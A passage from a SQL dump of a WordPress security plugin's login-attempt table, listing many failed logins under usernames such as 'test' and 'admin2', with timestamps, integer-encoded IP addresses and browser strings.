(103272, 1499521759.878483, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103273, 1499521760.188077, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103274, 1499521760.499795, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103275, 1499521760.808017, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103276, 1499521761.117550, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103277, 1499521761.427043, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103278, 1499521761.736765, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103279, 1499521762.046861, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103280, 1499521762.355870, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103281, 1499521762.665666, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103282, 1499521762.979078, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103283, 1499521763.371485, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103284, 1499521763.681342, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103285, 1499521763.990832, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103286, 1499521764.300321, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103287, 1499521764.609840, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103288, 1499521919.635035, 1, 'loginFailInvalidUsername', 'test', 0, 2081236943, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103289, 1499521921.121204, 1, 'loginFailInvalidUsername', 'test', 0, 2081236943, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103290, 1499523601.796684, 1, 'loginFailInvalidUsername', 'test', 0, 1331095837, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103291, 1499523603.056653, 1, 'loginFailInvalidUsername', 'test', 0, 1331095837, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103292, 1499524789.225753, 1, 'loginFailInvalidUsername', 'test', 0, 1549948000, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103293, 1499524790.581601, 1, 'loginFailInvalidUsername', 'test', 0, 1549948000, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103294, 1499526779.565656, 1, 'loginFailValidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/533.01.48 (KHTML, like Gecko) Chrome/57.4.9071.4709 Safari/533.31'),
(103295, 1499528794.644551, 1, 'loginFailInvalidUsername', 'test', 0, 1887831582, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103296, 1499530643.595914, 1, 'loginFailInvalidUsername', 'test', 0, 3413305865, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103297, 1499530644.758703, 1, 'loginFailInvalidUsername', 'test', 0, 3413305865, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103298, 1499532760.028203, 1, 'loginFailInvalidUsername', 'test', 0, 762555418, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103299, 1499532761.875591, 1, 'loginFailInvalidUsername', 'test', 0, 762555418, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103300, 1499535206.976097, 1, 'loginFailInvalidUsername', 'test', 0, 1394954292, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103301, 1499535208.004560, 1, 'loginFailInvalidUsername', 'test', 0, 1394954292, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103302, 1499535689.566235, 1, 'loginFailInvalidUsername', 'test', 0, 1300171228, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103303, 1499535690.645707, 1, 'loginFailInvalidUsername', 'test', 0, 1300171228, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103304, 1499535904.246916, 1, 'loginFailInvalidUsername', 'test', 0, 3360902085, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103305, 1499535905.864084, 1, 'loginFailInvalidUsername', 'test', 0, 3360902085, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103306, 1499535917.697184, 1, 'loginFailInvalidUsername', 'test', 0, 2091416540, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103307, 1499535919.487212, 1, 'loginFailInvalidUsername', 'test', 0, 2091416540, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103308, 1499537558.539584, 1, 'loginFailInvalidUsername', 'test', 0, 1993567403, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103309, 1499537560.126566, 1, 'loginFailInvalidUsername', 'test', 0, 1993567403, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103310, 1499539703.195723, 1, 'loginFailInvalidUsername', 'test', 0, 763103202, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103311, 1499539704.736229, 1, 'loginFailInvalidUsername', 'test', 0, 763103202, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103312, 1499543809.526524, 1, 'loginFailInvalidUsername', 'test', 0, 2588279925, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103313, 1499543811.098952, 1, 'loginFailInvalidUsername', 'test', 0, 2588279925, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103314, 1499547610.166144, 1, 'loginFailInvalidUsername', 'test', 0, 3147442234, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103315, 1499547611.622756, 1, 'loginFailInvalidUsername', 'test', 0, 3147442234, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103316, 1499549078.075279, 1, 'loginFailInvalidUsername', 'test', 0, 1299092496, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103317, 1499549079.251014, 1, 'loginFailInvalidUsername', 'test', 0, 1299092496, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103318, 1499552960.505000, 1, 'loginFailInvalidUsername', 'test', 0, 1569731776, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103319, 1499552961.619053, 1, 'loginFailInvalidUsername', 'test', 0, 1569731776, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103320, 1499554670.305278, 1, 'loginFailInvalidUsername', 'test', 0, 3170051237, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103321, 1499554671.355316, 1, 'loginFailInvalidUsername', 'test', 0, 3170051237, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103322, 1499555632.330522, 1, 'loginFailInvalidUsername', 'test', 0, 1776310817, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103323, 1499556758.367867, 1, 'loginFailInvalidUsername', 'test', 0, 1781732063, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103324, 1499556759.719230, 1, 'loginFailInvalidUsername', 'test', 0, 1781732063, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103325, 1499562086.603608, 1, 'loginFailInvalidUsername', 'test', 0, 1610237772, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103326, 1499563048.371684, 1, 'loginFailInvalidUsername', 'test', 0, 2971068426, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103327, 1499563702.849074, 1, 'loginFailInvalidUsername', 'test', 0, 831956932, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103328, 1499563704.756509, 1, 'loginFailInvalidUsername', 'test', 0, 831956932, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103329, 1499563766.326209, 1, 'loginFailInvalidUsername', 'test', 0, 3185090186, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103330, 1499563767.619293, 1, 'loginFailInvalidUsername', 'test', 0, 3185090186, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103331, 1499573766.276431, 1, 'loginFailInvalidUsername', 'test', 0, 2979847696, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103332, 1499575183.514124, 1, 'loginFailInvalidUsername', 'test', 0, 831604747, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103333, 1499575185.259626, 1, 'loginFailInvalidUsername', 'test', 0, 831604747, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103334, 1499575583.214086, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_21_79) AppleWebKit/531.73.20 (KHTML, like Gecko) Chrome/55.1.6147.1875 Safari/532.02 Edge/36.06978'),
(103335, 1499577831.380982, 1, 'loginFailInvalidUsername', 'test', 0, 2869229270, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103336, 1499577833.305460, 1, 'loginFailInvalidUsername', 'test', 0, 2869229270, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103337, 1499579491.717902, 1, 'loginFailInvalidUsername', 'test', 0, 16883149, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103338, 1499579723.264150, 1, 'loginFailInvalidUsername', 'test', 0, 837087165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103339, 1499579892.018430, 1, 'loginFailInvalidUsername', 'test', 0, 3200584913, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103340, 1499583850.617238, 1, 'loginFailInvalidUsername', 'test', 0, 3197645454, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103341, 1499583964.917623, 1, 'loginFailInvalidUsername', 'test', 0, 86730617, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103342, 1499584482.569817, 1, 'loginFailInvalidUsername', 'test', 0, 1185626759, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103343, 1499584483.759941, 1, 'loginFailInvalidUsername', 'test', 0, 1185626759, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103344, 1499585556.430262, 1, 'loginFailInvalidUsername', 'test', 0, 1231956485, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1');
INSERT INTO `wp_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(103345, 1499585557.695046, 1, 'loginFailInvalidUsername', 'test', 0, 1231956485, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103346, 1499585833.406722, 1, 'loginFailInvalidUsername', 'test', 0, 1824959805, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103347, 1499585835.345684, 1, 'loginFailInvalidUsername', 'test', 0, 1824959805, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103348, 1499593406.993900, 1, 'loginFailInvalidUsername', 'test', 0, 1443625125, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103349, 1499593408.060207, 1, 'loginFailInvalidUsername', 'test', 0, 1443625125, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103350, 1499593460.588497, 1, 'loginFailInvalidUsername', 'test', 0, 1345377155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103351, 1499593461.619595, 1, 'loginFailInvalidUsername', 'test', 0, 1345377155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103352, 1499594484.143027, 1, 'loginFailInvalidUsername', 'test', 0, 1409380298, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103353, 1499594485.180767, 1, 'loginFailInvalidUsername', 'test', 0, 1409380298, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103354, 1499595946.751296, 1, 'loginFailInvalidUsername', 'test', 0, 3163511040, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103355, 1499595947.784100, 1, 'loginFailInvalidUsername', 'test', 0, 3163511040, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103356, 1499597887.657514, 1, 'loginFailInvalidUsername', 'test', 0, 1976123259, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103357, 1499597889.133480, 1, 'loginFailInvalidUsername', 'test', 0, 1976123259, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103358, 1499599067.474067, 1, 'loginFailInvalidUsername', 'test', 0, 3417436567, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103359, 1499599069.050666, 1, 'loginFailInvalidUsername', 'test', 0, 3417436567, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103360, 1499600574.181319, 1, 'loginFailInvalidUsername', 'test', 0, 1892043913, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103361, 1499600576.360942, 1, 'loginFailInvalidUsername', 'test', 0, 1892043913, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103362, 1499601915.268594, 1, 'loginFailInvalidUsername', 'test', 0, 2630499626, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103363, 1499601916.436772, 1, 'loginFailInvalidUsername', 'test', 0, 2630499626, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103364, 1499602770.704167, 1, 'loginFailInvalidUsername', 'test', 0, 3319472730, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103365, 1499602773.198091, 1, 'loginFailInvalidUsername', 'test', 0, 3319472730, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103366, 1499604991.522628, 1, 'loginFailInvalidUsername', 'test', 0, 1486762851, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103367, 1499604992.799480, 1, 'loginFailInvalidUsername', 'test', 0, 1486762851, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103368, 1499605448.216789, 1, 'loginFailInvalidUsername', 'test', 0, 3057106319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103369, 1499605449.761862, 1, 'loginFailInvalidUsername', 'test', 0, 3057106319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103370, 1499612233.343273, 1, 'loginFailInvalidUsername', 'test', 0, 3177859328, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103371, 1499612235.663835, 1, 'loginFailInvalidUsername', 'test', 0, 3177859328, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103372, 1499612486.942194, 1, 'loginFailInvalidUsername', 'test', 0, 1451197307, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103373, 1499612487.922832, 1, 'loginFailInvalidUsername', 'test', 0, 1451197307, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103374, 1499615827.967903, 1, 'loginFailInvalidUsername', 'test', 0, 1382268166, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103375, 1499615828.947546, 1, 'loginFailInvalidUsername', 'test', 0, 1382268166, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103376, 1499615831.746367, 1, 'loginFailInvalidUsername', 'test', 0, 3136471353, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103377, 1499615833.123901, 1, 'loginFailInvalidUsername', 'test', 0, 3136471353, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103378, 1499616447.107801, 1, 'loginFailInvalidUsername', 'test', 0, 3128213840, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103379, 1499616448.498361, 1, 'loginFailInvalidUsername', 'test', 0, 3128213840, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103380, 1499616538.492877, 1, 'loginFailInvalidUsername', 'test', 0, 1729372066, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103381, 1499616540.302146, 1, 'loginFailInvalidUsername', 'test', 0, 1729372066, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103382, 1499617900.129442, 1, 'loginFailInvalidUsername', 'test', 0, 1176445815, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103383, 1499617901.317644, 1, 'loginFailInvalidUsername', 'test', 0, 1176445815, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103384, 1499621977.489121, 1, 'loginFailInvalidUsername', 'test', 0, 1393864342, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103385, 1499621978.548352, 1, 'loginFailInvalidUsername', 'test', 0, 1393864342, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103386, 1499623231.079960, 1, 'loginFailInvalidUsername', 'test', 0, 779420885, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103387, 1499626531.843392, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/532.94.47 (KHTML, like Gecko) Chrome/57.5.0669.5931 Safari/534.65 OPR/40.6.1481.6654'),
(103388, 1499628203.835511, 1, 'loginFailInvalidUsername', 'test', 0, 3144234785, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103389, 1499628205.262855, 1, 'loginFailInvalidUsername', 'test', 0, 3144234785, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103390, 1499629816.061521, 1, 'loginFailInvalidUsername', 'test', 0, 3315580339, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103391, 1499629817.736908, 1, 'loginFailInvalidUsername', 'test', 0, 3315580339, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103392, 1499632033.555609, 1, 'loginFailInvalidUsername', 'test', 0, 92696206, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103393, 1499632034.587579, 1, 'loginFailInvalidUsername', 'test', 0, 92696206, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103394, 1499632428.526891, 1, 'loginFailInvalidUsername', 'test', 0, 1612157886, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103395, 1499632429.614496, 1, 'loginFailInvalidUsername', 'test', 0, 1612157886, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103396, 1499636760.554689, 1, 'loginFailInvalidUsername', 'test', 0, 702968555, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103397, 1499636761.833784, 1, 'loginFailInvalidUsername', 'test', 0, 702968555, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103398, 1499637385.597415, 1, 'loginFailInvalidUsername', 'test', 0, 3065221390, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103399, 1499637386.944260, 1, 'loginFailInvalidUsername', 'test', 0, 3065221390, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103400, 1499638341.423933, 1, 'loginFailInvalidUsername', 'test', 0, 736129142, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103401, 1499638343.312626, 1, 'loginFailInvalidUsername', 'test', 0, 736129142, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103402, 1499638406.898717, 1, 'loginFailInvalidUsername', 'test', 0, 1314156440, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103403, 1499639552.545447, 1, 'loginFailInvalidUsername', 'test', 0, 1579330244, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103404, 1499639553.605573, 1, 'loginFailInvalidUsername', 'test', 0, 1579330244, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103405, 1499639880.151582, 1, 'loginFailInvalidUsername', 'test', 0, 1296128796, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103406, 1499639881.145440, 1, 'loginFailInvalidUsername', 'test', 0, 1296128796, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103407, 1499640303.412187, 1, 'loginFailInvalidUsername', 'test', 0, 1229694860, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103408, 1499640304.567864, 1, 'loginFailInvalidUsername', 'test', 0, 1229694860, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103409, 1499647387.227329, 1, 'loginFailInvalidUsername', 'test', 0, 1430305916, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103410, 1499647388.434162, 1, 'loginFailInvalidUsername', 'test', 0, 1430305916, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103411, 1499648689.284682, 1, 'loginFailInvalidUsername', 'test', 0, 2830446697, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103412, 1499652619.401777, 1, 'loginFailInvalidUsername', 'test', 0, 831760205, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103413, 1499652621.580714, 1, 'loginFailInvalidUsername', 'test', 0, 831760205, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103414, 1499653013.712699, 1, 'loginFailInvalidUsername', 'test', 0, 3032370800, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103415, 1499654903.534397, 1, 'loginFailInvalidUsername', 'test', 0, 2047078917, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103416, 1499655683.703146, 1, 'loginFailInvalidUsername', 'test', 0, 1743248074, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103417, 1499655715.777957, 1, 'loginFailInvalidUsername', 'test', 0, 1287217583, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103418, 1499656486.798499, 1, 'loginFailInvalidUsername', 'test', 0, 1892904470, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103419, 1499661153.331904, 1, 'loginFailInvalidUsername', 'test', 0, 656427239, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103420, 1499661154.626180, 1, 'loginFailInvalidUsername', 'test', 0, 656427239, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103421, 1499662252.948001, 1, 'loginFailInvalidUsername', 'test', 0, 1951800347, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103422, 1499662254.425107, 1, 'loginFailInvalidUsername', 'test', 0, 1951800347, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
